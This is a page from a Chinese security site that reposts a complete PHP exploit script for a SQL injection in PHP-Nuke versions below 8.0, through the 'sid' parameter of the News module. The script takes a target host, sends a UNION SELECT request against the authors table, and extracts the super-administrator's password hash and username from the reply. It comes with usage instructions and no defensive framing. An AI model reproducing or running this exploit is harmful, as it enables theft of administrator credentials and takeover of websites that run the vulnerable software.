首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHP-Nuke < 8.0 (sid) Remote SQL Injection Exploit 来源：RST/GHC 作者：Foster 发布时间：2008-01-23   <?php error_reporting (E_ERROR); ini_set("max_execution_time",0); echo ' +=========================================+ | RST/GHC unpublished PHP Nuke exploit <8 | +=========================================+ <+> version <8.0 <+> Tested on 7.9 & 6.0 '; if ($argc < 2){ print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n"; print "ex.: " . $argv[0] . " phpnuke.org 7\n"; credits(); exit; } /* few definitions */ if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix else {$prefix = $argv[3];} switch ($argv[2]){ case "6": $query ="modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'"; $version = 6; break; default: $query ="modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1"; $version = 7; break; } $host = 'http://' . $argv[1] . '/'; # argv[1] - host $http = $host . $query; echo '[+] host: '.$host . ' [+] nuke version: '.$version.' '; #DEBUG //print $http . "\n"; $result = file_get_contents($http); preg_match("/([a-f0-9]{32})/", $result, $matches); if ($matches[0]) {print "Admin's Hash: ".$matches[0]; if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];} else {echo "Exploit failed...";} credits(); function credits(){ print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC"; print "\n\r+========================================+\n"; exit; } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·YaBB SE <= 1.5.5 Remote Comman ·PHP-Nuke <= 8.0 Final (sid) Re ·SetCMS 3.6.5 (setcms.org) Remo ·Invision Gallery <= 2.0.7 Remo ·Coppermine Photo Gallery <= 1. ·Lycos FileUploader Control Act ·HP Virtual Rooms WebHPVCInstal ·Comodo AntiVirus 2.0 ExecuteSt ·Coppermine Photo Gallery 1.4.1 ·Apple iPhone 1.1.2 Remote Deni ·Axigen <= 5.0.2 AXIMilter Remo ·Move Networks Upgrade Manager   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved